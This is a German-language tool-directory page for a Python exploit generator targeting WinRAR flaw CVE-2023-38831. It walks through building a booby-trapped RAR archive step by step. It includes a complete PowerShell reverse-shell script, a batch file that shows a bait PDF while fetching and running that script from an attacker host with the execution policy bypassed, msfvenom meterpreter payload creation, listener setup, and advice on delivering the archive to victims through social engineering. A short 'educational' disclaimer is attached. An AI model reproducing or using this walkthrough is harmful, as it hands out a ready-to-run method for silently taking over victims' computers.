Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38831-Exploit — Dieses Projekt enthält ein Python-Skript, das **CVE-2023-38831** ausnutzt, eine Schwachstelle in **WinRAR**-Versionen vor 6.23. Der Exploit erzeugt ein **bösartiges RAR-Archiv**, das die Ausführung beliebigen Codes auslöst, wenn das Opfer eine harmlos aussehende Datei im Archiv öffnet (z. B. eine PDF). | Kitploit
Tools/GitHubGitHub/technicalcorp0/cve-2023-38831-exploit
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsSocial EngineeringLernen & BildungRed Teaming
GitHubtechnicalcorp0/cve-2023-38831-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2023-38831-Exploit

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Dieses Projekt enthält ein Python-Skript, das **CVE-2023-38831** ausnutzt, eine Schwachstelle in **WinRAR**-Versionen vor 6.23. Der Exploit erzeugt ein **bösartiges RAR-Archiv**, das die Ausführung beliebigen Codes auslöst, wenn das Opfer eine harmlos aussehende Datei im Archiv öffnet (z. B. eine PDF).

Teilen

CVE-2023-38831 WinRAR-Exploit-Generator

Erstellt von: technical_corp

Dieses Projekt enthält ein Python-Skript, das CVE-2023-38831 ausnutzt, eine Schwachstelle in WinRAR-Versionen vor 6.23. Der Exploit erzeugt ein bösartiges RAR-Archiv, das die Ausführung von beliebigem Code auslöst, wenn das Opfer eine harmlos aussehende Datei im Archiv (z. B. eine PDF) öffnet. Die Schwachstelle wurde von April bis August 2023 aktiv in freier Wildbahn ausgenutzt.

Überblick über die Schwachstelle

CVE-2023-38831 ist eine Schwachstelle in WinRAR, die es Angreifern ermöglicht, beliebigen Code auszuführen, wenn das Opfer ein Archiv öffnet, das sowohl eine harmlose Datei als auch einen bösartigen Ordner mit demselben Namen enthält. Wenn der Benutzer mit der harmlosen Datei interagiert, verarbeitet WinRAR fälschlicherweise den Inhalt des bösartigen Ordners und führt die Nutzlast des Angreifers aus.

Exploit-Funktionen

  • Erzeugt ein bösartiges RAR-Archiv, das eine Köderdatei (z. B. eine PDF) und eine Nutzlast (z. B. eine .bat- oder .exe-Datei) enthält.
  • Die Köderdatei kann eine beliebige, vom Benutzer angegebene Datei sein (z. B. eine PDF oder ein Dokument).
  • Die Nutzlast kann jede ausführbare Datei oder jedes Skript sein (z. B. eine mit msfvenom erstellte Reverse-Shell).
  • Wenn das Opfer die Köderdatei öffnet, wird die Nutzlast still im Hintergrund ausgeführt.

Voraussetzungen

  • Python 3.x
  • Auf dem Opfer-Rechner muss WinRAR in einer Version vor 6.23 installiert sein (das ist die verwundbare Version).
  • Laden Sie WinRAR 6.22 von hier herunter
  • Metasploit Framework (optional, zum Erzeugen von Nutzlasten).

Verwendung

Dieses Repository klonen:

root@kitploit:~
git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
cd CVE-2023-38831-Exploit

Wir verwenden eine Batch-Datei, die in einem .rar-Archiv eingebettet ist, um eine gehostete PowerShell-Reverse-Shell herunterzuladen und auszuführen.

Schritte:

Erstellen Sie das PowerShell-Reverse-Shell-Skript:

Speichern Sie das folgende PowerShell-Skript als reverse.ps1 auf Ihrem Kali-Linux-Rechner:

root@kitploit:~
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

Ersetzen Sie <attacker_ip> durch die IP-Adresse Ihres Kali-Linux-Rechners.

Ersetzen Sie <attacker_port> durch die Portnummer, auf der Sie lauschen werden.

Hosten Sie das PowerShell-Skript auf Ihrem Kali-Linux-Rechner:

Navigieren Sie zu dem Ordner, in dem das PowerShell-Skript gespeichert ist:

root@kitploit:~
cd /path/to/powershell-script

Verwenden Sie den HTTP-Server von Python, um die Datei auf Port 80 zu hosten:

root@kitploit:~
python3 -m http.server 80

Dadurch ist reverse.ps1 unter http://<attacker_ip>/reverse.ps1 verfügbar.

Erstellen Sie eine Batch-Datei zum Herunterladen und Ausführen des PowerShell-Skripts:

Erstellen Sie eine Batch-Datei (script.bat), die die PowerShell-Reverse-Shell herunterlädt und ausführt:

root@kitploit:~
@echo off
:: Open the legitimate PDF
start bait.pdf

:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit

Verwenden Sie das CVE-2023-38831-Exploit-Skript, um die Batch-Datei einzubetten:

Führen Sie das WinRAR-Exploit-Skript aus, um die Batch-Datei in eine legitime PDF einzubetten:

root@kitploit:~
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar

Dieser Befehl erstellt die Datei POC.rar, die script.bat enthält, welche die Reverse-Shell ausführt.

Netcat-Listener unter Kali Linux einrichten:

Starten Sie einen Netcat-Listener, um die Reverse-Shell zu empfangen:

root@kitploit:~
nc -lvnp <attacker_port>

Liefern Sie den Exploit (POC.rar) an das Opfer:

Sobald das Opfer die POC.rar öffnet und die PDF-Datei ausführt, wird die script.bat ausgelöst. Das Skript lädt die PowerShell-Reverse-Shell von Ihrem Server herunter und führt sie aus. Sie erhalten eine Reverse-Shell-Verbindung auf Ihrem Netcat-Listener.

Verwenden einer ausführbaren Datei ohne sofortige Ausführung:

Generieren Sie eine Nutzlast (falls Sie Metasploit verwenden): Sie können mit msfvenom eine Reverse-Shell-Nutzlast erstellen:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Verschieben Sie die erstellte Datei payload.exe in das CVE-2023-WinRAR-Exploit-Verzeichnis

Führen Sie den Exploit-Generator aus: Führen Sie das Python-Skript aus, um eine bösartige RAR-Datei zu erzeugen:

root@kitploit:~
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar

-b: Geben Sie die Köderdatei an (z. B. nmapcheatsheet.pdf). -p: Geben Sie die Nutzlastdatei an (z. B. script.bat oder payload.exe). -o: Geben Sie den Namen der Ausgabedatei an (z. B. POC.rar).

Liefern Sie die RAR-Datei an das Opfer: Die erzeugte Datei malicious_archive.rar kann über Social Engineering, E-Mail-Anhänge oder File-Sharing-Plattformen an das Opfer geliefert werden.

Richten Sie einen Listener ein (falls Sie Metasploit verwenden): Richten Sie auf Ihrem Angreifer-Rechner einen Listener ein, um die Reverse-Shell zu empfangen:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit

Exploit-Ablauf

Der Angreifer liefert eine bösartige RAR-Datei an das Opfer. Das Opfer öffnet die Köderdatei (z. B. nmapcheatsheet.pdf), wodurch die Nutzlast still ausgelöst wird. Die Nutzlast (z. B. eine Reverse-Shell) wird im Hintergrund ausgeführt und verschafft dem Angreifer die Kontrolle über das System des Opfers.

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken. Der Autor übernimmt keine Verantwortung für einen Missbrauch dieses Exploits. Es sollte nur in autorisierten Umgebungen oder in Penetrationstest-Szenarien mit vollständiger Einwilligung verwendet werden.

Tool herunterladen